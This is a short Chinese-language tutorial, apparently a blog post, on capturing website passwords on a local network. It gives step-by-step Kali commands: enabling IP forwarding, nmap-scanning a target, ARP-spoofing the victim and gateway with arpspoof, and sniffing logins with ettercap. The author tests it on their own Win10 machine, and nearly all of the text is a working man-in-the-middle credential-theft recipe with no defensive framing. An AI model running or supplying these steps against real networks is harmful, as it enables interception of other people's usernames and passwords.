内网渗透之谁动了我的密码,http密码抓获。
通过内网欺骗抓取网站密码
实验工具(都是kali自带的)
kali Linux
win10电脑一台
arpspoof
ettercap
操作步骤
1,开启IP转发
[email protected]:~# echo 1 >> /proc/sys/net/ipv4/ip_forward
查看是否开启,有1就是开启,是0就是没有开启
[email protected]:~# cat /proc/sys/net/ipv4/ip_forward
1
2,扫描肉鸡(我用自己的win10当肉鸡)
[email protected]:nmap -sS 192.168.1.132
3,开始欺骗
arpspoof -i eth0 -t 192.168.1.132 192.168.1.254
-i 后面是 网卡名
-t 后面是IP地址和网关
4,新打开一个终端,截取密码
[email protected]:~# ettercap -Tq -i eth0
-i 是网卡名
-t启动文本模式
-q安静模式
5,用自己的win10登录一个网站,就能抓到登录的网站,用户,密码。(缺点被攻击的电脑网络会掉线,实验效果并不佳)